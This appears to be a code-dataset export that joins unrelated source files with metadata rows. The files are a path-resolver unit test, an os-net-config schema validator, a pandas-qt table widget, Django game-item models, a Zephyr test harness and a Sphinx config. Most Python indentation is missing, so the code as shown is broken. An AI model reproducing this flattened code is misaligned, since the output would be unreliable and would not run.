self.assertEqual(r[0], '/app/something/foo.rb')
self.assertEqual(r[1], '/something/foo.rb')
def test_finds_source_from_erb(self):
file = '/spec/views/namespace/users/_something.html.erb_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/namespace/users/_something.html.erb')
self.assertEqual(r[1], '/views/namespace/users/_something.html.erb')
def test_finds_source_from_haml(self):
file = '/spec/views/documents/update.html.haml_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/documents/update.html.haml')
self.assertEqual(r[1], '/views/documents/update.html.haml')
	def test_finds_source_from_jbuilder(self):
file = '/spec/views/documents/show.json.jbuilder_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/documents/show.json.jbuilder')
self.assertEqual(r[1], '/views/documents/show.json.jbuilder')
def test_finds_source_from_lib(self):
file = '/spec/lib/something/foo_spec.rb'
r = Resolver().get_source(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/lib/something/foo.rb')
# get_spec
def test_finds_spec(self):
file = '/app/models/user.rb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/models/user_spec.rb')
def test_finds_spec_from_lib(self):
file = '/lib/foo/utility.rb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/lib/foo/utility_spec.rb')
def test_finds_spec_from_erb(self):
file = '/app/views/users/new.html.erb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/views/users/new.html.erb_spec.rb')
def test_finds_spec_from_haml(self):
file = '/app/views/account/login.html.haml'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/views/account/login.html.haml_spec.rb')
def test_finds_spec_from_jbuilder(self):
file = '/app/views/account/show.json.jbuilder'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/views/account/show.json.jbuilder_spec.rb')
def test_finds_spec_from_other(self):
file = '/foo/user.rb'
r = Resolver().get_spec(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/foo/user_spec.rb')
# run
# returns either the source or spec depending on the given file
def test_run(self):
file = '/app/decorators/namespace/user_decorator.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/decorators/namespace/user_decorator_spec.rb')
def test_run_from_lib(self):
file = '/lib/utilities/namespace/foo.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/spec/lib/utilities/namespace/foo_spec.rb')
def test_run_from_spec(self):
file = '/spec/controllers/namespace/foo_controller_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/controllers/namespace/foo_controller.rb')
self.assertEqual(r[1], '/controllers/namespace/foo_controller.rb')
def test_run_from_spec_lib(self):
file = '/spec/lib/namespace/foo_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 1)
self.assertEqual(r[0], '/lib/namespace/foo.rb')
def test_run_for_erb_spec(self):
file = '/spec/views/namespace/users/_new.html.erb_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/namespace/users/_new.html.erb')
self.assertEqual(r[1], '/views/namespace/users/_new.html.erb')
def test_run_for_jbuilder_spec(self):
file = '/spec/views/namespace/users/show.json.jbuilder_spec.rb'
r = Resolver().run(file)
self.assertEqual(len(r), 2)
self.assertEqual(r[0], '/app/views/namespace/users/show.json.jbuilder')
self.assertEqual(r[1], '/views/namespace/users/show.json.jbuilder')
if __name__ == '__main__':
unittest.main()
| mit | -3,987,177,846,458,583,600 | 31.935065 | 77 | 0.695386 | false |
openstack/os-net-config | os_net_config/validator.py | 1 | 7202 | # -*- coding: utf-8 -*-
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import jsonschema
import pkg_resources
import yaml
def get_os_net_config_schema():
"""Returns the schema for os_net_config's config files."""
schema_string = pkg_resources.resource_string(__name__, "schema.yaml")
return yaml.safe_load(schema_string)
def get_schema_for_defined_type(defined_type):
"""Returns the schema for a given defined type of the full schema."""
full_schema = get_os_net_config_schema()
type_schema = copy.deepcopy(full_schema["definitions"][defined_type])
type_schema["$schema"] = full_schema["$schema"]
type_schema["definitions"] = full_schema["definitions"]
return type_schema
def validate_config(config, config_name="Config file"):
"""Validates a list of interface/bridge configurations against the schema.
If validation fails, returns a list of validation error message strings.
If validation succeeds, returns an empty list.
`config_name` can be used to prefix errors with a more specific name.
"""
return _validate_config(config, config_name,
get_os_net_config_schema(), True)
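# Minimal sketch of the expected input/output; the interface entry below is
# illustrative rather than taken from a real os-net-config file:
#
#     config = [{'type': 'interface', 'name': 'em1', 'use_dhcp': True}]
#     errors = validate_config(config, config_name='test config')
#     if errors:
#         for message in errors:
#             print(message)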
def _validate_config(config, config_name, schema, filter_errors):
error_messages = []
validator = jsonschema.Draft4Validator(schema)
v_errors = validator.iter_errors(config)
v_errors = sorted(v_errors, key=lambda e: e.path)
for v_error in v_errors:
error_message = _get_consistent_error_message(v_error)
details = _get_detailed_errors(v_error, 1, v_error.schema_path,
schema, filter_errors=filter_errors)
config_path = '/'.join([str(x) for x in v_error.path])
if details:
error_messages.append(
"{} failed schema validation at network_config/{}:\n"
" {}\n"
" Sub-schemas tested and not matching:\n"
" {}"
.format(config_name, config_path, error_message,
'\n '.join(details)))
else:
error_messages.append(
"{} failed schema validation at network_config/{}:\n"
" {}"
.format(config_name, config_path, error_message))
return error_messages
def _get_consistent_error_message(error):
"""Returns error messages consistent across Python 2 and 3.
jsonschema uses repr() to print its error messages, which means strings
will render as "u'...'" in Python 2 and "'...'" in Python 3, making
testing for error messages unnecessarily difficult.
"""
if error.validator == 'type':
return "'{}' is not of type '{}'".format(
error.instance, error.validator_value)
elif error.validator == 'enum':
return "'{}' is not one of ['{}']".format(
error.instance, "','".join(error.validator_value))
elif error.validator == 'required':
if error.message[0:2] == "u'":
return error.message[1:]
return error.message
def _get_detailed_errors(error, depth, absolute_schema_path, absolute_schema,
filter_errors=True):
"""Returns a list of error messages from all subschema validations.
Recurses the error tree and adds one message per sub error. That list can
get long, because jsonschema also tests the hypothesis that the provided
network element type is wrong (e.g. "ovs_bridge" instead of "ovs_bond").
Setting `filter_errors=True` assumes the type, if specified, is correct and
therefore produces a much shorter list of more relevant results.
"""
if not error.context:
return []
sub_errors = error.context
if filter_errors:
if (absolute_schema_path[-1] in ['oneOf', 'anyOf'] and
isinstance(error.instance, collections.Mapping) and
'type' in error.instance):
found, index = _find_type_in_schema_list(
error.validator_value, error.instance['type'])
if found:
sub_errors = [i for i in sub_errors if (
i.schema_path[0] == index)]
details = []
sub_errors = sorted(sub_errors, key=lambda e: e.schema_path)
for sub_error in sub_errors:
schema_path = collections.deque(absolute_schema_path)
schema_path.extend(sub_error.schema_path)
details.append("{} {}: {}".format(
'-' * depth,
_pretty_print_schema_path(schema_path, absolute_schema),
_get_consistent_error_message(sub_error)))
details.extend(_get_detailed_errors(
sub_error, depth + 1, schema_path, absolute_schema,
filter_errors))
return details
def _find_type_in_schema_list(schemas, type_to_find):
"""Finds an object of a given type in an anyOf/oneOf array.
Returns a tuple (`found`, `index`), where `found` indicates whether
on object of type `type_to_find` was found in the `schemas` array.
If so, `index` contains the object's position in the array.
"""
for index, schema in enumerate(schemas):
if not isinstance(schema, collections.Mapping):
continue
if ('$ref' in schema and
schema['$ref'].split('/')[-1] == type_to_find):
return (True, index)
if ('properties' in schema and 'type' in schema['properties'] and
schema['properties']['type'] == type_to_find):
return (True, index)
return (False, 0)
def _pretty_print_schema_path(absolute_schema_path, absolute_schema):
"""Returns a representation of the schema path that's easier to read.
For example:
>>> _pretty_print_schema_path("items/oneOf/0/properties/use_dhcp/oneOf/2")
"items/oneOf/interface/use_dhcp/oneOf/param"
"""
pretty_path = []
current_path = []
current_schema = absolute_schema
for item in absolute_schema_path:
if item not in ["properties"]:
pretty_path.append(item)
current_path.append(item)
current_schema = current_schema[item]
if (isinstance(current_schema, collections.Mapping) and
'$ref' in current_schema):
if (isinstance(pretty_path[-1], int) and
pretty_path[-2] in ['oneOf', 'anyOf']):
pretty_path[-1] = current_schema['$ref'].split('/')[-1]
current_path = current_schema['$ref'].split('/')
current_schema = absolute_schema
for i in current_path[1:]:
current_schema = current_schema[i]
return '/'.join([str(x) for x in pretty_path])
| apache-2.0 | -4,055,297,311,342,866,400 | 38.790055 | 79 | 0.621772 | false |
datalyze-solutions/pandas-qt | pandasqt/views/DataTableView.py | 1 | 13381 | # -*- coding: utf-8 -*-
from pandasqt.compat import QtCore, QtGui, Qt, Slot, Signal
from pandasqt.models.DataFrameModel import DataFrameModel
from pandasqt.views.EditDialogs import AddAttributesDialog, RemoveAttributesDialog
from pandasqt.views.CustomDelegates import createDelegate
from pandasqt.models.mime import PandasCellPayload, MimeData
from pandasqt.models.SupportedDtypes import SupportedDtypes
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
class DragTable(QtGui.QTableView):
def __init__(self, parent=None):
"""create a table view with the ability to start drag operations"""
super(DragTable, self).__init__(parent)
self.setDragEnabled(True)
def startDrag(self, index):
"""start a drag operation with a PandasCellPayload on defined index.
Args:
index (QModelIndex): model index you want to start the drag operation.
"""
if not index.isValid():
return
dataFrame = self.model().dataFrame()
# get all infos from dataFrame
dfindex = dataFrame.iloc[[index.row()]].index
columnName = dataFrame.columns[index.column()]
dtype = dataFrame[columnName].dtype
value = dataFrame[columnName][dfindex]
# create the mime data
mimePayload = PandasCellPayload(
dfindex,
columnName,
value,
dtype,
hex(id(self.model()))
)
mimeData = MimeData()
mimeData.setData(mimePayload)
# create the drag icon and start drag operation
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
pixmap = QtGui.QPixmap(":/icons/insert-table.png")
drag.setHotSpot(QtCore.QPoint(pixmap.width()/3, pixmap.height()/3))
drag.setPixmap(pixmap)
result = drag.start(Qt.MoveAction)
def mouseMoveEvent(self, event):
super(DragTable, self).mouseMoveEvent(event)
self.startDrag(self.indexAt(event.pos()))
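# Minimal usage sketch (added for illustration, not part of the original file);
# assumes `model` is an already-populated DataFrameModel instance:
#
#   table = DragTable()
#   table.setModel(model)
#   table.show()   # dragging a cell now carries a PandasCellPayload as mime data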
class DataTableWidget(QtGui.QWidget):
"""A Custom widget with a TableView and a toolbar.
This widget shall display all `DataFrameModels` and
enable the editing of this (edit data, adding/removing,
rows/columns).
"""
def __init__(self, parent=None, iconSize=QtCore.QSize(36, 36)):
"""Constructs the object with the given parent.
Args:
parent (QObject, optional): Causes the objected to be owned
by `parent` instead of Qt. Defaults to `None`.
iconSize (QSize, optional): Size of edit buttons. Defaults to QSize(36, 36).
"""
super(DataTableWidget, self).__init__(parent)
self._iconSize = iconSize
self.initUi()
def initUi(self):
"""Initalizes the Uuser Interface with all sub widgets.
"""
self.gridLayout = QtGui.QGridLayout(self)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.buttonFrame = QtGui.QFrame(self)
#self.buttonFrame.setMinimumSize(QtCore.QSize(250, 50))
#self.buttonFrame.setMaximumSize(QtCore.QSize(250, 50))
self.buttonFrame.setFrameShape(QtGui.QFrame.NoFrame)
spacerItemButton = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.buttonFrameLayout = QtGui.QGridLayout(self.buttonFrame)
self.buttonFrameLayout.setContentsMargins(0, 0, 0, 0)
self.editButton = QtGui.QToolButton(self.buttonFrame)
self.editButton.setObjectName('editbutton')
self.editButton.setText(self.tr(u'edit'))
self.editButton.setToolTip(self.tr(u'toggle editing mode'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/document-edit.png')))
self.editButton.setIcon(icon)
self.addColumnButton = QtGui.QToolButton(self.buttonFrame)
self.addColumnButton.setObjectName('addcolumnbutton')
self.addColumnButton.setText(self.tr(u'+col'))
self.addColumnButton.setToolTip(self.tr(u'add new column'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-insert-column-right.png')))
self.addColumnButton.setIcon(icon)
self.addRowButton = QtGui.QToolButton(self.buttonFrame)
self.addRowButton.setObjectName('addrowbutton')
self.addRowButton.setText(self.tr(u'+row'))
self.addRowButton.setToolTip(self.tr(u'add new row'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-insert-row-below.png')))
self.addRowButton.setIcon(icon)
self.removeColumnButton = QtGui.QToolButton(self.buttonFrame)
self.removeColumnButton.setObjectName('removecolumnbutton')
self.removeColumnButton.setText(self.tr(u'-col'))
self.removeColumnButton.setToolTip(self.tr(u'remove a column'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-delete-column.png')))
self.removeColumnButton.setIcon(icon)
self.removeRowButton = QtGui.QToolButton(self.buttonFrame)
self.removeRowButton.setObjectName('removerowbutton')
self.removeRowButton.setText(self.tr(u'-row'))
self.removeRowButton.setToolTip(self.tr(u'remove selected rows'))
icon = QtGui.QIcon(QtGui.QPixmap(_fromUtf8(':/icons/edit-table-delete-row.png')))
self.removeRowButton.setIcon(icon)
self.buttons = [self.editButton, self.addColumnButton, self.addRowButton, self.removeColumnButton, self.removeRowButton]
for index, button in enumerate(self.buttons):
button.setMinimumSize(self._iconSize)
button.setMaximumSize(self._iconSize)
button.setIconSize(self._iconSize)
button.setCheckable(True)
self.buttonFrameLayout.addWidget(button, 0, index, 1, 1)
self.buttonFrameLayout.addItem(spacerItemButton, 0, index+1, 1, 1)
for button in self.buttons[1:]:
button.setEnabled(False)
#self.tableView = QtGui.QTableView(self)
self.tableView = DragTable(self)
self.tableView.setAlternatingRowColors(True)
self.tableView.setSortingEnabled(True)
self.gridLayout.addWidget(self.buttonFrame, 0, 0, 1, 1)
self.gridLayout.addWidget(self.tableView, 1, 0, 1, 1)
self.editButton.toggled.connect(self.enableEditing)
self.addColumnButton.toggled.connect(self.showAddColumnDialog)
self.addRowButton.toggled.connect(self.addRow)
self.removeRowButton.toggled.connect(self.removeRow)
self.removeColumnButton.toggled.connect(self.showRemoveColumnDialog)
def setButtonsVisible(self, visible):
"""hide/show the edit buttons"""
self.buttonFrame.setVisible(visible)
@Slot(bool)
def enableEditing(self, enabled):
"""Enable the editing buttons to add/remove rows/columns and to edit the data.
This method is also a slot.
        In addition, the data of the model will be made editable
        if the `enabled` parameter is true.
Args:
enabled (bool): This flag indicates, if the buttons
shall be activated.
"""
for button in self.buttons[1:]:
button.setEnabled(enabled)
if button.isChecked():
button.setChecked(False)
model = self.tableView.model()
if model is not None:
model.enableEditing(enabled)
@Slot()
def uncheckButton(self):
"""Removes the checked stated of all buttons in this widget.
This method is also a slot.
"""
#for button in self.buttons[1:]:
for button in self.buttons:
            # suppress editButtons toggled event
button.blockSignals(True)
if button.isChecked():
button.setChecked(False)
button.blockSignals(False)
@Slot(str, object, object)
def addColumn(self, columnName, dtype, defaultValue):
"""Adds a column with the given parameters to the underlying model
This method is also a slot.
If no model is set, nothing happens.
Args:
columnName (str): The name of the new column.
dtype (numpy.dtype): The datatype of the new column.
defaultValue (object): Fill the column with this value.
"""
model = self.tableView.model()
if model is not None:
model.addDataFrameColumn(columnName, dtype, defaultValue)
self.addColumnButton.setChecked(False)
@Slot(bool)
def showAddColumnDialog(self, triggered):
"""Display the dialog to add a column to the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the dialog will be created and shown.
"""
if triggered:
dialog = AddAttributesDialog(self)
dialog.accepted.connect(self.addColumn)
dialog.rejected.connect(self.uncheckButton)
dialog.show()
@Slot(bool)
def addRow(self, triggered):
"""Adds a row to the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the row will be appended to the end.
"""
if triggered:
model = self.tableView.model()
model.addDataFrameRows()
self.sender().setChecked(False)
@Slot(bool)
def removeRow(self, triggered):
"""Removes a row to the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the selected row will be removed
from the model.
"""
if triggered:
model = self.tableView.model()
selection = self.tableView.selectedIndexes()
rows = [index.row() for index in selection]
model.removeDataFrameRows(set(rows))
self.sender().setChecked(False)
@Slot(list)
def removeColumns(self, columnNames):
"""Removes one or multiple columns from the model.
This method is also a slot.
Args:
columnNames (list): A list of columns, which shall
be removed from the model.
"""
model = self.tableView.model()
if model is not None:
model.removeDataFrameColumns(columnNames)
self.removeColumnButton.setChecked(False)
@Slot(bool)
def showRemoveColumnDialog(self, triggered):
"""Display the dialog to remove column(s) from the model.
This method is also a slot.
Args:
triggered (bool): If the corresponding button was
activated, the dialog will be created and shown.
"""
if triggered:
model = self.tableView.model()
if model is not None:
columns = model.dataFrameColumns()
dialog = RemoveAttributesDialog(columns, self)
dialog.accepted.connect(self.removeColumns)
dialog.rejected.connect(self.uncheckButton)
dialog.show()
def setViewModel(self, model):
"""Sets the model for the enclosed TableView in this widget.
Args:
model (DataFrameModel): The model to be displayed by
the Table View.
"""
if isinstance(model, DataFrameModel):
self.enableEditing(False)
self.uncheckButton()
selectionModel = self.tableView.selectionModel()
self.tableView.setModel(model)
model.dtypeChanged.connect(self.updateDelegate)
model.dataChanged.connect(self.updateDelegates)
del selectionModel
def setModel(self, model):
"""Sets the model for the enclosed TableView in this widget.
Args:
model (DataFrameModel): The model to be displayed by
the Table View.
"""
self.setViewModel(model)
def model(self):
"""Gets the viewModel"""
return self.view().model()
def viewModel(self):
"""Gets the viewModel"""
return self.view().model()
def view(self):
"""Gets the enclosed TableView
Returns:
QtGui.QTableView: A Qt TableView object.
"""
return self.tableView
def updateDelegate(self, column, dtype):
"""update the delegates for a specific column
Args:
column (int): column index.
dtype (str): data type of column.
"""
# as documented in the setDelegatesFromDtype function
# we need to store all delegates, so going from
# type A -> type B -> type A
# would cause a segfault if not stored.
createDelegate(dtype, column, self.tableView)
def updateDelegates(self):
"""reset all delegates"""
for index, column in enumerate(self.tableView.model().dataFrame().columns):
dtype = self.tableView.model().dataFrame()[column].dtype
self.updateDelegate(index, dtype)
def selectionModel(self):
"""return the table views selectionModel"""
return self.view().selectionModel() | mit | 1,387,420,655,620,008,400 | 33.312821 | 128 | 0.626112 | false |
PeteAndersen/swarfarm | bestiary/models/items.py | 1 | 6510 | from django.contrib.postgres.fields import ArrayField
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.db import models
from django.utils.safestring import mark_safe
from django.utils.text import slugify
from . import base
ESSENCE_MAP = {
'magic': {
'low': 11006,
'mid': 12006,
'high': 13006,
},
'water': {
'low': 11001,
'mid': 12001,
'high': 13001,
},
'fire': {
'low': 11002,
'mid': 12002,
'high': 13002,
},
'wind': {
'low': 11003,
'mid': 12003,
'high': 13003,
},
'light': {
'low': 11004,
'mid': 12004,
'high': 13004,
},
'dark': {
'low': 11005,
'mid': 12005,
'high': 13005,
},
}
class GameItem(models.Model):
CATEGORY_MONSTER = 1
CATEGORY_CURRENCY = 6
CATEGORY_RUNE = 8
CATEGORY_SUMMON_SCROLL = 9
CATEGORY_BOOSTER = 10
CATEGORY_ESSENCE = 11
CATEGORY_MONSTER_PIECE = 12
CATEOGRY_GUILD_MONSTER_PIECE = 19
CATEGORY_RAINBOWMON = 25
CATEGORY_RUNE_CRAFT = 27
CATEGORY_CRAFT_STUFF = 29
CATEGORY_SECRET_DUNGEON = 30
CATEGORY_MATERIAL_MONSTER = 61
CATEGORY_ARTIFACT = 73
CATEGORY_ARTIFACT_CRAFT = 75
CATEGORY_CHOICES = (
(CATEGORY_MONSTER, 'Monster'),
(CATEGORY_CURRENCY, 'Currency'),
(CATEGORY_SUMMON_SCROLL, 'Summoning Scroll'),
(CATEGORY_BOOSTER, 'Booster'),
(CATEGORY_ESSENCE, 'Essence'),
(CATEGORY_MONSTER_PIECE, 'Monster Piece'),
(CATEOGRY_GUILD_MONSTER_PIECE, 'Guild Monster Piece'),
(CATEGORY_RAINBOWMON, 'Rainbowmon'),
(CATEGORY_RUNE_CRAFT, 'Rune Craft'),
(CATEGORY_CRAFT_STUFF, 'Craft Material'),
(CATEGORY_SECRET_DUNGEON, 'Secret Dungeon'),
(CATEGORY_MATERIAL_MONSTER, 'Enhancing Monster'),
(CATEGORY_ARTIFACT, 'Artifact'),
(CATEGORY_ARTIFACT_CRAFT, 'Artifact Craft Material'),
)
com2us_id = models.IntegerField()
category = models.IntegerField(choices=CATEGORY_CHOICES, help_text='Typically corresponds to `item_master_id` field')
name = models.CharField(max_length=200)
icon = models.CharField(max_length=200, blank=True, null=True)
description = models.TextField(blank=True, default='')
slug = models.CharField(max_length=200)
sell_value = models.IntegerField(blank=True, null=True)
class Meta:
unique_together = (
'com2us_id',
'category',
)
ordering = (
'category',
'com2us_id',
)
def __str__(self):
return self.name
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super().save(*args, **kwargs)
def image_tag(self):
if self.icon:
path = static('herders/images/items/' + self.icon)
return mark_safe(f'<img src="{path}" height="42" width="42" loading="lazy" />')
else:
return 'No Image'
class ItemQuantity(models.Model):
# Abstract model for representing quantities of items for various purposes
item = models.ForeignKey(GameItem, on_delete=models.CASCADE)
quantity = models.IntegerField()
def __str__(self):
return f'{self.item.name} - qty. {self.quantity}'
class Meta:
abstract = True
class Building(models.Model, base.Elements):
AREA_GENERAL = 0
AREA_GUILD = 1
AREA_CHOICES = [
(AREA_GENERAL, 'Everywhere'),
(AREA_GUILD, 'Guild Content'),
]
# TODO: Replace these with base.Stats model
STAT_HP = 0
STAT_ATK = 1
STAT_DEF = 2
STAT_SPD = 3
STAT_CRIT_RATE_PCT = 4
STAT_CRIT_DMG_PCT = 5
STAT_RESIST_PCT = 6
STAT_ACCURACY_PCT = 7
MAX_ENERGY = 8
MANA_STONE_STORAGE = 9
MANA_STONE_PRODUCTION = 10
ENERGY_PRODUCTION = 11
ARCANE_TOWER_ATK = 12
ARCANE_TOWER_SPD = 13
STAT_CHOICES = [
(STAT_HP, 'HP'),
(STAT_ATK, 'ATK'),
(STAT_DEF, 'DEF'),
(STAT_SPD, 'SPD'),
(STAT_CRIT_RATE_PCT, 'CRI Rate'),
(STAT_CRIT_DMG_PCT, 'CRI Dmg'),
(STAT_RESIST_PCT, 'Resistance'),
(STAT_ACCURACY_PCT, 'Accuracy'),
(MAX_ENERGY, 'Max. Energy'),
(MANA_STONE_STORAGE, 'Mana Stone Storage'),
(MANA_STONE_PRODUCTION, 'Mana Stone Production Rate'),
(ENERGY_PRODUCTION, 'Energy Production Rate'),
(ARCANE_TOWER_ATK, 'Arcane Tower ATK'),
(ARCANE_TOWER_SPD, 'Arcane Tower SPD'),
]
PERCENT_STATS = [
STAT_HP,
STAT_ATK,
STAT_DEF,
STAT_SPD,
STAT_CRIT_RATE_PCT,
STAT_CRIT_DMG_PCT,
STAT_RESIST_PCT,
STAT_ACCURACY_PCT,
MANA_STONE_PRODUCTION,
ENERGY_PRODUCTION,
ARCANE_TOWER_ATK,
ARCANE_TOWER_SPD,
]
com2us_id = models.IntegerField()
name = models.CharField(max_length=30)
max_level = models.IntegerField()
area = models.IntegerField(choices=AREA_CHOICES, null=True, blank=True)
affected_stat = models.IntegerField(choices=STAT_CHOICES, null=True, blank=True)
element = models.CharField(max_length=6, choices=base.Elements.ELEMENT_CHOICES, blank=True, null=True)
stat_bonus = ArrayField(models.IntegerField(blank=True, null=True))
upgrade_cost = ArrayField(models.IntegerField(blank=True, null=True))
description = models.TextField(null=True, blank=True)
icon_filename = models.CharField(max_length=100, null=True, blank=True)
def image_url(self):
if self.icon_filename:
return mark_safe('<img src="%s" height="42" width="42" loading="lazy" />' % static('herders/images/buildings/' + self.icon_filename))
else:
return 'No Image'
def __str__(self):
return self.name
class Source(models.Model):
name = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
icon_filename = models.CharField(max_length=100, null=True, blank=True)
farmable_source = models.BooleanField(default=False)
meta_order = models.IntegerField(db_index=True, default=0)
def image_url(self):
if self.icon_filename:
return mark_safe('<img src="%s" height="42" width="42" loading="lazy" />' % static('herders/images/icons/' + self.icon_filename))
else:
return 'No Image'
def __str__(self):
return self.name
class Meta:
ordering = ['meta_order', 'icon_filename', 'name']
| apache-2.0 | -2,082,593,143,098,325,200 | 28.862385 | 145 | 0.601075 | false |
explora26/zephyr | scripts/sanity_chk/harness.py | 1 | 3312 | import re
from collections import OrderedDict
class Harness:
GCOV_START = "GCOV_COVERAGE_DUMP_START"
GCOV_END = "GCOV_COVERAGE_DUMP_END"
FAULTS = [
"Unknown Fatal Error",
"MPU FAULT",
"Kernel Panic",
"Kernel OOPS",
"BUS FAULT",
"CPU Page Fault"
]
def __init__(self):
self.state = None
self.type = None
self.regex = []
self.matches = OrderedDict()
self.ordered = True
self.repeat = 1
self.tests = {}
self.id = None
self.fail_on_fault = True
self.fault = False
self.capture_coverage = False
def configure(self, instance):
config = instance.test.harness_config
self.id = instance.test.id
if "ignore_faults" in instance.test.tags:
self.fail_on_fault = False
if config:
self.type = config.get('type', None)
self.regex = config.get('regex', [] )
self.repeat = config.get('repeat', 1)
self.ordered = config.get('ordered', True)
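# Illustrative sketch of the testcase YAML this configure() maps onto
# (assumed example only; key names follow the config.get() calls above):
#
#   harness: console
#   harness_config:
#     type: multi_line
#     ordered: true
#     regex:
#       - "step 1 passed"
#       - "step 2 passed"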
class Console(Harness):
def handle(self, line):
if self.type == "one_line":
pattern = re.compile(self.regex[0])
if pattern.search(line):
self.state = "passed"
elif self.type == "multi_line":
for r in self.regex:
pattern = re.compile(r)
if pattern.search(line) and not r in self.matches:
self.matches[r] = line
if len(self.matches) == len(self.regex):
# check ordering
if self.ordered:
ordered = True
pos = 0
for k,v in self.matches.items():
if k != self.regex[pos]:
ordered = False
pos += 1
if ordered:
self.state = "passed"
else:
self.state = "failed"
else:
self.state = "passed"
if self.fail_on_fault:
for fault in self.FAULTS:
if fault in line:
self.fault = True
if self.GCOV_START in line:
self.capture_coverage = True
elif self.GCOV_END in line:
self.capture_coverage = False
class Test(Harness):
RUN_PASSED = "PROJECT EXECUTION SUCCESSFUL"
RUN_FAILED = "PROJECT EXECUTION FAILED"
def handle(self, line):
result = re.compile("(PASS|FAIL|SKIP) - (test_)?(.*)")
match = result.match(line)
if match:
name = "{}.{}".format(self.id, match.group(3))
self.tests[name] = match.group(1)
if self.RUN_PASSED in line:
if self.fault:
self.state = "failed"
else:
self.state = "passed"
if self.RUN_FAILED in line:
self.state = "failed"
if self.fail_on_fault:
for fault in self.FAULTS:
if fault in line:
self.fault = True
if self.GCOV_START in line:
self.capture_coverage = True
elif self.GCOV_END in line:
self.capture_coverage = False
| apache-2.0 | 3,593,360,791,085,379,000 | 29.109091 | 66 | 0.485809 | false |
LinkCareServices/period | docs/conf.py | 1 | 8403 | # -*- coding: utf-8 -*-
#
# period documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 10 18:37:45 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
#import os
sys.path.append("../")
from build_scripts.version import get_hg_version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autosummary', 'sphinx.ext.autodoc',
'sphinx.ext.doctest', 'sphinx.ext.viewcode',
'sphinx.ext.intersphinx', 'sphinx.ext.todo',
'sphinx.ext.graphviz', 'sphinx.ext.inheritance_diagram', ]
todo_include_todos = True
intersphinx_mapping = {
'python': ('http://docs.python.org/2.7', None),
}
if tags.has('maintenance'):
autodoc_default_flags = []
else:
autodoc_default_flags = ['members', 'undoc-members',
'private-members']
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'period'
copyright = u'Link Care Services'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = get_hg_version()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
